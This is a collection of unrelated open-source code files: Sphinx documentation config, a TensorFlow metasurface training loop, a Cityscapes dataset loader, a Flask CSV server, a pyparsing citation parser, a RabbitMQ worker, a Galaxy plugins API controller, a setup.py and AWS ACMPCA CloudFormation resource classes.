# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
# html_sidebars = {
# '**': ['searchbox.html', 'globaltoc_custom.html'],
# 'using/windows': ['searchbox.html', 'windowssidebar.html'],
# }
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "torchgandoc"
# on_rtd is whether we are on readthedocs.org
on_rtd = os.environ.get("READTHEDOCS", None) == "True"
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
def setup(app):
# app.add_javascript("custom.js")
app.add_stylesheet("theme_overrides.css")
else:
# Override default css to get a larger width for ReadTheDoc build
html_context = {
"css_files": [
"https://media.readthedocs.org/css/sphinx_rtd_theme.css",
"https://media.readthedocs.org/css/readthedocs-doc-embed.css",
"_static/theme_overrides.css",
]
}
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc,
"torchgan.tex",
"torchgan Documentation",
"Avik Pal and Aniket Das",
"manual",
)
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "torchgan", "torchgan Documentation", [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"torchgan",
"torchgan Documentation",
author,
"torchgan",
"One line description of project.",
"Miscellaneous",
)
]
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ["search.html"]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("https://docs.python.org/3/", None),
"numpy": ("https://docs.scipy.org/doc/numpy/", None),
"pytorch": ("https://pytorch.org/docs/stable", None),
}
|
the-stack_0_3833 | import tensorflow as tf
import numpy as np
from networks.select import select_G
from dataset import train_dataset_sim, test_dataset_sim
from loss import G_loss
from args import parse_args
import metasurface.solver as solver
import metasurface.conv as conv
import scipy.optimize as scp_opt
import os
import time
## Logging for TensorBoard
def log(img, gt_img, Phase_var, G, snr, vgg_model, summary_writer, step, params, args):
# Metasurface simulation
if args.psf_mode == 'SIM_PSF':
solver.set_wavelengths(params, params['lambda_base'])
psfs_debug, psfs_conv_forward = solver.get_psfs(Phase_var * args.bound_val, params, conv_mode=args.conv, aug_rotate=args.aug_rotate)
psfs_conv_deconv = psfs_conv_forward
if args.offset:
# This allow for spatial sensitivity training
psfs_conv_forward = psfs_conv_forward[1:,:,:,:]
psfs_conv_deconv = psfs_conv_deconv[:-1,:,:,:]
assert(psfs_conv_forward.shape[0] == psfs_conv_deconv.shape[0])
elif args.psf_mode == 'REAL_PSF':
real_psf = np.load(args.real_psf)
real_psf = tf.constant(real_psf, dtype=tf.float32)
real_psf = tf.image.resize_with_crop_or_pad(real_psf, params['psf_width'], params['psf_width'])
real_psf = real_psf / tf.reduce_sum(real_psf, axis=(1,2), keepdims=True)
psfs_debug = real_psf
psfs_conv_forward = real_psf
psfs_conv_deconv = real_psf
else:
assert False, ("Unsupported PSF mode")
conv_image = params['conv_fn'](img, psfs_conv_forward)
sensor_img = solver.sensor_noise(conv_image, params)
_, G_img, G_debug = params['deconv_fn'](sensor_img, psfs_conv_deconv, snr, G, training=False)
# Losses
gt_img = tf.image.resize_with_crop_or_pad(gt_img, params['out_width'], params['out_width'])
G_Content_loss_val, G_loss_components, G_metrics = G_loss(G_img, gt_img, vgg_model, args)
# Save records to TensorBoard
with summary_writer.as_default():
# Images
tf.summary.image(name = 'Input/Input' , data=img, step=step)
tf.summary.image(name = 'Input/GT' , data=gt_img, step=step)
if args.offset:
num_patches = np.size(params['theta_base']) - 1
else:
num_patches = np.size(params['theta_base'])
for i in range(num_patches):
tf.summary.image(name = 'Output/Output_'+str(i), data=G_img[i:i+1,:,:,:], step=step)
tf.summary.image(name = 'Blur/Blur_'+str(i), data=conv_image[i:i+1,:,:,:], step=step)
tf.summary.image(name = 'Sensor/Sensor_'+str(i), data=sensor_img[i:i+1,:,:,:], step=step)
for j, debug in enumerate(G_debug):
tf.summary.image(name = 'Debug/Debug_'+str(j)+'_'+str(i), data=debug[i:i+1,:,:,:] , step=step)
# PSF
for i in range(np.size(params['theta_base'])):
psf_patch = psfs_debug[i:i+1,:,:,:]
tf.summary.image(name='PSF/PSF_'+str(i),
data=psf_patch / tf.reduce_max(psf_patch), step=step)
for l in range(np.size(params['lambda_base'])):
psf_patch = psfs_debug[i:i+1,:,:,l:l+1]
tf.summary.image(name='PSF_'+str(params['lambda_base'][l])+'/PSF_'+str(i),
data=psf_patch / tf.reduce_max(psf_patch), step=step)
for i in range(Phase_var.shape[0]):
tf.summary.scalar(name = 'Phase/Phase_'+str(i), data=Phase_var[i], step=step)
# Metrics
tf.summary.scalar(name = 'metrics/G_PSNR', data = G_metrics['PSNR'], step=step)
tf.summary.scalar(name = 'metrics/G_SSIM', data = G_metrics['SSIM'], step=step)
tf.summary.scalar(name = 'snr', data = snr, step=step)
# Content losses
tf.summary.scalar(name = 'loss/G_Content_loss', data = G_Content_loss_val, step=step)
tf.summary.scalar(name = 'loss/G_Norm_loss' , data = G_loss_components['Norm'], step=step)
tf.summary.scalar(name = 'loss/G_P_loss' , data = G_loss_components['P'], step=step)
tf.summary.scalar(name = 'loss/G_Spatial_loss', data = G_loss_components['Spatial'], step=step)
## Optimization Step
def train_step(mode, img, gt_img, Phase_var, Phase_optimizer, G, G_optimizer, snr, vgg_model, params, args):
with tf.GradientTape() as G_tape:
# Metasurface simulation
if args.psf_mode == 'SIM_PSF':
solver.set_wavelengths(params, params['lambda_base'])
psfs_debug, psfs_conv_forward = solver.get_psfs(Phase_var * args.bound_val, params, conv_mode=args.conv, aug_rotate=args.aug_rotate)
psfs_conv_deconv = psfs_conv_forward
if args.offset:
# This allow for spatial sensitivity training
psfs_conv_forward = psfs_conv_forward[1:,:,:,:]
psfs_conv_deconv = psfs_conv_deconv[:-1,:,:,:]
assert(psfs_conv_forward.shape[0] == psfs_conv_deconv.shape[0])
elif args.psf_mode == 'REAL_PSF':
real_psf = np.load(args.real_psf)
real_psf = tf.constant(real_psf, dtype=tf.float32)
real_psf = tf.image.resize_with_crop_or_pad(real_psf, params['psf_width'], params['psf_width'])
real_psf = real_psf / tf.reduce_sum(real_psf, axis=(1,2), keepdims=True)
psfs_debug = real_psf
psfs_conv_forward = real_psf
psfs_conv_deconv = real_psf
else:
assert False, ("Unsupported PSF mode")
conv_image = params['conv_fn'](img, psfs_conv_forward)
sensor_img = solver.sensor_noise(conv_image, params)
_, G_img, _ = params['deconv_fn'](sensor_img, psfs_conv_deconv, snr, G, training=True)
# Losses
gt_img = tf.image.resize_with_crop_or_pad(gt_img, params['out_width'], params['out_width'])
G_loss_val, G_loss_components, G_metrics = G_loss(G_img, gt_img, vgg_model, args)
# Apply gradients
if mode == 'Phase':
Phase_gradients = G_tape.gradient(G_loss_val, Phase_var)
Phase_optimizer.apply_gradients([(Phase_gradients, Phase_var)])
Phase_var.assign(tf.clip_by_value(Phase_var, -1.0, 1.0)) # Clipped to normalized phase range
elif mode == 'G':
G_vars = G.trainable_variables
if args.snr_opt:
G_vars.append(snr)
G_gradients = G_tape.gradient(G_loss_val, G_vars)
G_optimizer.apply_gradients(zip(G_gradients, G_vars))
if args.snr_opt:
snr.assign(tf.clip_by_value(snr, 3.0, 4.0))
else:
assert False, "Non-existant training mode"
## Training loop
def train(args):
## Metasurface
params = solver.initialize_params(args)
if args.metasurface == 'random':
phase_initial = np.random.uniform(low = -args.bound_val, high = args.bound_val, size = params['num_coeffs'])
elif args.metasurface == 'zeros':
phase_initial = np.zeros(params['num_coeffs'], dtype=np.float32)
elif args.metasurface == 'single':
phase_initial = np.array([-np.pi * (params['Lx'] * params['pixelsX'] / 2) ** 2 / params['wavelength_nominal'] / params['f'], 0.0, 0.0, 0.0, 0.0], dtype=np.float32)
elif args.metasurface == 'neural':
# Best parameters with neural optimization
phase_initial = np.array([-0.3494864 , -0.00324192, -1. , -1. ,
-1. , -1. , -1. , -1. ], dtype=np.float32)
phase_initial = phase_initial * args.bound_val # <-- should be 1000
assert(args.bound_val == 1000)
else:
if args.metasurface == 'log_asphere':
phase_log = solver.log_asphere_phase(args.s1, args.s2, params)
elif args.metasurface == 'shifted_axicon':
phase_log = solver.shifted_axicon_phase(args.s1, args.s2, params)
elif args.metasurface == 'squbic':
phase_log = solver.squbic_phase(args.A, params)
elif args.metasurface == 'hyperboidal':
phase_log = solver.hyperboidal_phase(args.target_wavelength, params)
elif args.metasurface == 'cubic':
phase_log = solver.cubic_phase(args.alpha, args.target_wavelength, params) # Only for direct inference
else:
assert False, ("Unsupported metasurface mode")
params['general_phase'] = phase_log # For direct phase inference
if args.use_general_phase:
assert(args.Phase_iters == 0)
# For optimization
lb = (params['pixelsX'] - params['pixels_aperture']) // 2
ub = (params['pixelsX'] + params['pixels_aperture']) // 2
x = params['x_mesh'][lb : ub, 0] / (0.5 * params['pixels_aperture'] * params['Lx'])
phase_slice = phase_log[0, lb : ub, params['pixelsX'] // 2]
p_fit, _ = scp_opt.curve_fit(params['phase_func'], x, phase_slice, bounds=(-args.bound_val, args.bound_val))
phase_initial = p_fit
print('Initial Phase: {}'.format(phase_initial), flush=True)
print('Image width: {}'.format(params['image_width']), flush=True)
# Normalize the phases within the bounds
phase_initial = phase_initial / args.bound_val
Phase_var = tf.Variable(phase_initial, dtype = tf.float32)
Phase_optimizer = tf.keras.optimizers.Adam(args.Phase_lr, beta_1=args.Phase_beta1)
# SNR term for deconvolution algorithm
snr = tf.Variable(args.snr_init, dtype=tf.float32)
# Do not optimize phase during finetuning
if args.psf_mode == 'REAL_PSF':
assert(args.Phase_iters == 0)
# Convolution mode
if args.offset:
assert(len(args.batch_weights) == len(args.theta_base) - 1)
else:
assert(len(args.batch_weights) == len(args.theta_base))
params['conv_fn'] = conv.convolution_tf(params, args)
params['deconv_fn'] = conv.deconvolution_tf(params, args)
## Network architectures
G = select_G(params, args)
G_optimizer = tf.keras.optimizers.Adam(args.G_lr, beta_1=args.G_beta1)
## Construct vgg for perceptual loss
if not args.P_loss_weight == 0:
vgg = tf.keras.applications.VGG19(include_top=False, weights='imagenet')
vgg_layers = [vgg.get_layer(name).output for name in args.vgg_layers.split(',')]
vgg_model = tf.keras.Model(inputs=vgg.input, outputs=vgg_layers)
vgg_model.trainable = False
else:
vgg_model = None
## Saving the model
checkpoint = tf.train.Checkpoint(Phase_optimizer=Phase_optimizer, Phase_var=Phase_var, G_optimizer=G_optimizer, G=G, snr=snr)
max_to_keep = args.max_to_keep
if args.max_to_keep == 0:
max_to_keep = None
manager = tf.train.CheckpointManager(checkpoint, directory=args.save_dir, max_to_keep=max_to_keep)
## Loading pre-trained model if exists
if not args.ckpt_dir == None:
status = checkpoint.restore(tf.train.latest_checkpoint(args.ckpt_dir, latest_filename=None))
status.expect_partial() # Silence warnings
#status.assert_existing_objects_matched() # Only partial load for networks (we don't load the optimizers)
#status.assert_consumed()
## Create summary writer for TensorBoard
summary_writer = tf.summary.create_file_writer(args.save_dir)
## Dataset
train_ds = iter(train_dataset_sim(params['out_width'], params['load_width'], args))
test_ds = list(test_dataset_sim(params['out_width'], params['load_width'], args).take(1))
## Do training
for step in range(args.steps):
start = time.time()
if step % args.save_freq == 0:
print('Saving', flush=True)
manager.save()
if step % args.log_freq == 0:
print('Logging', flush=True)
test_batch = test_ds[0]
img = test_batch[0]
gt_img = test_batch[1]
log(img, gt_img, Phase_var, G, snr, vgg_model, summary_writer, step, params, args)
for _ in range(args.Phase_iters):
img_batch = next(train_ds)
img = img_batch[0]
gt_img = img_batch[1]
train_step('Phase', img, gt_img, Phase_var, Phase_optimizer, G, G_optimizer, snr, vgg_model, params, args)
for _ in range(args.G_iters):
img_batch = next(train_ds)
img = img_batch[0]
gt_img = img_batch[1]
train_step('G', img, gt_img, Phase_var, Phase_optimizer, G, G_optimizer, snr, vgg_model, params, args)
print("Step time: {}\n".format(time.time() - start), flush=True)
## Entry point
def main():
args = parse_args()
train(args)
if __name__ == '__main__':
main()
|
the-stack_0_3835 | import os
import numpy as np
from PIL import Image
from .seg_dataset import SegDataset
from .voc_seg_dataset import VOCMetaInfo
class CityscapesSegDataset(SegDataset):
"""
Cityscapes semantic segmentation dataset.
Parameters:
----------
root : str
Path to a folder with `leftImg8bit` and `gtFine` subfolders.
mode : str, default 'train'
'train', 'val', 'test', or 'demo'.
transform : callable, optional
A function that transforms the image.
"""
def __init__(self,
root,
mode="train",
transform=None,
**kwargs):
super(CityscapesSegDataset, self).__init__(
root=root,
mode=mode,
transform=transform,
**kwargs)
image_dir_path = os.path.join(root, "leftImg8bit")
mask_dir_path = os.path.join(root, "gtFine")
assert os.path.exists(image_dir_path) and os.path.exists(mask_dir_path), "Please prepare dataset"
mode_dir_name = "train" if mode == "train" else "val"
image_dir_path = os.path.join(image_dir_path, mode_dir_name)
# mask_dir_path = os.path.join(mask_dir_path, mode_dir_name)
self.images = []
self.masks = []
for image_subdir_path, _, image_file_names in os.walk(image_dir_path):
for image_file_name in image_file_names:
if image_file_name.endswith(".png"):
image_file_path = os.path.join(image_subdir_path, image_file_name)
mask_file_name = image_file_name.replace("leftImg8bit", "gtFine_labelIds")
mask_subdir_path = image_subdir_path.replace("leftImg8bit", "gtFine")
mask_file_path = os.path.join(mask_subdir_path, mask_file_name)
if os.path.isfile(mask_file_path):
self.images.append(image_file_path)
self.masks.append(mask_file_path)
else:
print("Cannot find the mask: {}".format(mask_file_path))
assert (len(self.images) == len(self.masks))
if len(self.images) == 0:
raise RuntimeError("Found 0 images in subfolders of: {}\n".format(image_dir_path))
self.add_getter('img', self._get_image)
self.add_getter('label', self._get_label)
def _get_image(self, i):
image = Image.open(self.images[i]).convert("RGB")
assert (self.mode in ("test", "demo"))
image = self._img_transform(image)
if self.transform is not None:
image = self.transform(image)
return image
def _get_label(self, i):
if self.mode == "demo":
return os.path.basename(self.images[i])
assert (self.mode == "test")
mask = Image.open(self.masks[i])
mask = self._mask_transform(mask)
return mask
classes = 19
vague_idx = 19
use_vague = True
background_idx = -1
ignore_bg = False
_key = np.array([-1, -1, -1, -1, -1, -1,
-1, -1, 0, 1, -1, -1,
2, 3, 4, -1, -1, -1,
5, -1, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15,
-1, -1, 16, 17, 18])
_mapping = np.array(range(-1, len(_key) - 1)).astype(np.int32)
@staticmethod
def _class_to_index(mask):
values = np.unique(mask)
for value in values:
assert(value in CityscapesSegDataset._mapping)
index = np.digitize(mask.ravel(), CityscapesSegDataset._mapping, right=True)
return CityscapesSegDataset._key[index].reshape(mask.shape)
@staticmethod
def _mask_transform(mask):
np_mask = np.array(mask).astype(np.int32)
np_mask = CityscapesSegDataset._class_to_index(np_mask)
np_mask[np_mask == -1] = CityscapesSegDataset.vague_idx
return np_mask
def __len__(self):
return len(self.images)
class CityscapesMetaInfo(VOCMetaInfo):
def __init__(self):
super(CityscapesMetaInfo, self).__init__()
self.label = "Cityscapes"
self.short_label = "voc"
self.root_dir_name = "cityscapes"
self.dataset_class = CityscapesSegDataset
self.num_classes = CityscapesSegDataset.classes
self.test_metric_extra_kwargs = [
{"vague_idx": CityscapesSegDataset.vague_idx,
"use_vague": CityscapesSegDataset.use_vague,
"macro_average": False},
{"num_classes": CityscapesSegDataset.classes,
"vague_idx": CityscapesSegDataset.vague_idx,
"use_vague": CityscapesSegDataset.use_vague,
"bg_idx": CityscapesSegDataset.background_idx,
"ignore_bg": CityscapesSegDataset.ignore_bg,
"macro_average": False}]
self.test_net_extra_kwargs = self.net_extra_kwargs
|
the-stack_0_3837 | from flask import Flask, jsonify # 新增代码。装入Flask
import pandas as pd
app = Flask(__name__) # 新增代码
@app.route("/") # 新增代码,对应执行root()函数
def root():
return app.send_static_file("visual.html")
@app.route("/getData1")
def getData1():
df = pd.read_csv("./out/PeopleInSubwayTime.csv")
data = [df.iloc[:, 0].tolist(), df.iloc[:, 1].tolist()]
print(data)
return jsonify(data)
@app.route("/getData2")
def getData2():
df = pd.read_csv("./out/PeopleInSubwayCount.csv")
data = [df.iloc[:, 0].tolist(), df.iloc[:, 1].tolist()]
print(data)
return jsonify(data)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=80, debug=True)
# eof
|
the-stack_0_3838 | # encoding: utf-8
import pyparsing as pyp
import re
def to_obj(result):
'''Convert nested ParseResults structure to list / dict.
Args:
result (ParseResults) : pyparsing result
Returns:
list / dict containing results
'''
d = result.asDict()
if d:
for k in d:
if isinstance(d[k], pyp.ParseResults):
d[k] = to_obj(d[k])
return d
l = result.asList()
for idx, v in enumerate(l):
if isinstance(v, pyp.ParseResults):
l[idx] = to_obj(v)
return l
def scan(pattern, string):
'''Scan a string for repeated occurrences of a pattern.
Args:
pattern (pyparsing pattern) : pattern to be applied
string (str) : text to be parsed
Returns:
list of matches as list / dict
'''
return [to_obj(match[0]) for match in
pattern.scanString(string)]
# ParseAction functions
def joiner(delim):
return lambda tokens: delim.join(tokens)
def parse_authors_factory(author_splitter, name_splitter):
'''Create a function for splitting author strings.
Args:
author_splitter (str) : pattern for splitting authors
name_splitter (str) : pattern for splitting names w/in an author
Returns:
author-splitter function
'''
def parse_authors(tokens):
authors = []
# Note: Since this action is normally chained after
# a joiner() action, only consider the 0th token
for token in re.split(author_splitter, tokens[0]):
if not token:
continue
token_split = re.split(name_splitter, token)
author = {}
author['family'] = token_split[0]
if len(token_split) > 1:
author['given'] = token_split[1]
authors.append(author)
return authors
return parse_authors
# Character sets
dash_chars = u'-–'
allowed_chars = u',;:\'"’&?!()'
# Elementary patterns
dashes = pyp.Word(dash_chars)
etal = pyp.Combine('et al' + pyp.ZeroOrMore('.'))
number = pyp.Word(pyp.nums)
date = '(' + number.setResultsName('date') + ')' + pyp.Optional('.')
words_neglook = ~date + ~number + ~etal + ~pyp.Literal('http') + ~pyp.Literal('doi')
word = pyp.Word(pyp.alphanums + dash_chars + allowed_chars)
words = pyp.OneOrMore(words_neglook + word).\
setParseAction(joiner(' '))
word_journal = pyp.Word(pyp.alphanums + dash_chars + allowed_chars + '.')
words_journal = pyp.OneOrMore(words_neglook + word_journal).\
setParseAction(joiner(' '))
# Meta-data patterns
# Note: Remember to copy words pattern to avoid
# changing other patterns
authors = pyp.Group(
words_journal.copy().\
addParseAction(parse_authors_factory(',', '\s'))
).setResultsName('author') + \
pyp.Optional(etal)
title = words.\
setResultsName('title')
journal = words_journal.\
setParseAction(joiner(' ')).\
setResultsName('journal-title')
volume = pyp.Optional(
number.\
setResultsName('volume') + \
pyp.Word(',:')
)
page_range = number + pyp.Suppress(dashes) + number
page_plos = pyp.Combine('e' + number)
pages = pyp.Optional(pyp.Group(page_range | page_plos).\
setResultsName('pages'))
doi = pyp.Optional(
pyp.Suppress(
pyp.Optional('doi:') + \
pyp.Optional('http://dx.doi.org/')
) + \
pyp.Regex(r'\b(10[.][0-9]{4,}(?:[.][0-9]+)*/(?:(?!["&\'<>])\S)+)\b')
).setResultsName('doi')
reference = authors + \
date + \
title + \
'.' + \
journal + \
volume + \
pages + \
pyp.Optional('.') + \
doi
|
the-stack_0_3839 | #!/usr/bin/env python
import pika
import time
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='rabbit'))
channel = connection.channel()
channel.queue_declare(queue='task_queue', durable=True)
print(' [*] Waiting for messages. To exit press CTRL+C')
def callback(ch, method, properties, body):
print(" [x] Received %r" % body)
time.sleep(body.count(b'.'))
print(" [x] Done")
ch.basic_ack(delivery_tag = method.delivery_tag)
channel.basic_qos(prefetch_count=1)
channel.basic_consume(callback,
queue='task_queue')
channel.start_consuming()
|
the-stack_0_3841 | """
Plugins resource control over the API.
"""
import logging
from galaxy import exceptions
from galaxy.managers import hdas, histories
from galaxy.web import expose_api
from galaxy.webapps.base.controller import BaseAPIController
log = logging.getLogger(__name__)
class PluginsController(BaseAPIController):
"""
RESTful controller for interactions with plugins.
"""
def __init__(self, app):
super().__init__(app)
self.hda_manager = hdas.HDAManager(app)
self.history_manager = histories.HistoryManager(app)
@expose_api
def index(self, trans, **kwargs):
"""
GET /api/plugins:
"""
registry = self._get_registry(trans)
dataset_id = kwargs.get("dataset_id")
if dataset_id is not None:
hda = self.hda_manager.get_accessible(self.decode_id(dataset_id), trans.user)
return registry.get_visualizations(trans, hda)
else:
return registry.get_plugins()
@expose_api
def show(self, trans, id, **kwargs):
"""
GET /api/plugins/{id}:
"""
registry = self._get_registry(trans)
history_id = kwargs.get("history_id")
if history_id is not None:
history = self.history_manager.get_owned(trans.security.decode_id(history_id), trans.user, current_history=trans.history)
result = {"hdas": []}
for hda in history.contents_iter(types=["dataset"], deleted=False, visible=True):
if registry.get_visualization(trans, id, hda):
result["hdas"].append({
"id": trans.security.encode_id(hda.id),
"name": hda.name
})
else:
result = registry.get_plugin(id).to_dict()
return result
def _get_registry(self, trans):
if not trans.app.visualizations_registry:
raise exceptions.MessageException("The visualization registry has not been configured.")
return trans.app.visualizations_registry
|
the-stack_0_3844 | from setuptools import setup, find_packages
import d2l
requirements = [
'jupyter==1.0.0',
'numpy==1.21.5',
'matplotlib==3.5.1',
'requests==2.25.1',
'pandas==1.2.4'
]
setup(
name='d2l',
version=d2l.__version__,
python_requires='>=3.5',
author='D2L Developers',
author_email='[email protected]',
url='https://d2l.ai',
description='Dive into Deep Learning',
license='MIT-0',
packages=find_packages(),
zip_safe=True,
install_requires=requirements,
)
|
the-stack_0_3847 | # Copyright (c) 2020, Mark Peek <[email protected]>
# All rights reserved.
#
# See LICENSE file for full license.
from . import AWSObject, AWSProperty, Tags
from .validators import (boolean, integer)
VALID_SIGNIN_ALGORITHM = ('SHA256WITHECDSA', 'SHA256WITHRSA',
'SHA384WITHECDSA', 'SHA384WITHRSA',
'SHA512WITHECDSA', 'SHA512WITHRSA')
VALID_VALIDITY_TYPE = ('ABSOLUTE', 'DAYS', 'END_DATE',
'MONTHS', 'YEARS')
VALID_KEY_ALGORITHM = ('EC_prime256v1', 'EC_secp384r1',
'RSA_2048', 'RSA_4096')
VALID_CERTIFICATEAUTHORITY_TYPE = ('ROOT', 'SUBORDINATE')
def validate_validity_type(validity_type):
"""Certificate Validity Type validation rule."""
if validity_type not in VALID_VALIDITY_TYPE:
raise ValueError("Certificate Validity Type must be one of: %s" %
", ".join(VALID_VALIDITY_TYPE))
return validity_type
def validate_signing_algorithm(signing_algorithm):
"""Certificate SigningAlgorithm validation rule."""
if signing_algorithm not in VALID_SIGNIN_ALGORITHM:
raise ValueError("Certificate SigningAlgorithm must be one of: %s" %
", ".join(VALID_SIGNIN_ALGORITHM))
return signing_algorithm
def validate_key_algorithm(key_algorithm):
"""CertificateAuthority KeyAlgorithm validation rule."""
if key_algorithm not in VALID_KEY_ALGORITHM:
raise ValueError("CertificateAuthority KeyAlgorithm must be one of: %s" % # NOQA
", ".join(VALID_KEY_ALGORITHM))
return key_algorithm
def validate_certificateauthority_type(certificateauthority_type):
"""CertificateAuthority Type validation rule."""
if certificateauthority_type not in VALID_CERTIFICATEAUTHORITY_TYPE:
raise ValueError("CertificateAuthority Type must be one of: %s" %
", ".join(VALID_CERTIFICATEAUTHORITY_TYPE))
return certificateauthority_type
class Validity(AWSProperty):
props = {
'Type': (validate_validity_type, True),
'Value': (integer, True),
}
class Certificate(AWSProperty):
resource_type = "AWS::ACMPCA::Certificate"
props = {
'CertificateAuthorityArn': (basestring, True),
'CertificateSigningRequest': (basestring, True),
'SigningAlgorithm': (validate_signing_algorithm, True),
'TemplateArn': (basestring, False),
'Validity': (Validity, True),
}
class CertificateAuthorityActivation(AWSObject):
resource_type = "AWS::ACMPCA::CertificateAuthorityActivation"
props = {
'Certificate': (basestring, True),
'CertificateAuthorityArn': (basestring, True),
'CertificateChain': (basestring, False),
'Status': (basestring, False),
}
class CrlConfiguration(AWSProperty):
props = {
'CustomCname': (basestring, False),
'Enabled': (boolean, False),
'ExpirationInDays': (integer, False),
'S3BucketName': (basestring, False),
}
class RevocationConfiguration(AWSProperty):
props = {
'CrlConfiguration': (CrlConfiguration, False)
}
class Subject(AWSObject):
props = {
'CommonName': (basestring, False),
'Country': (basestring, False),
'DistinguishedNameQualifier': (basestring, False),
'GenerationQualifier': (basestring, False),
'GivenName': (basestring, False),
'Initials': (basestring, False),
'Locality': (basestring, False),
'Organization': (basestring, False),
'OrganizationalUnit': (basestring, False),
'Pseudonym': (basestring, False),
'SerialNumber': (basestring, False),
'State': (basestring, False),
'Surname': (basestring, False),
'Title': (basestring, False),
}
class CertificateAuthority(AWSObject):
resource_type = "AWS::ACMPCA::CertificateAuthority"
props = {
'KeyAlgorithm': (validate_key_algorithm, True),
'RevocationConfiguration': (RevocationConfiguration, False),
'SigningAlgorithm': (validate_signing_algorithm, True),
'Subject': (Subject, True),
'Tags': (Tags, False),
'Type': (validate_certificateauthority_type, True),
}
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.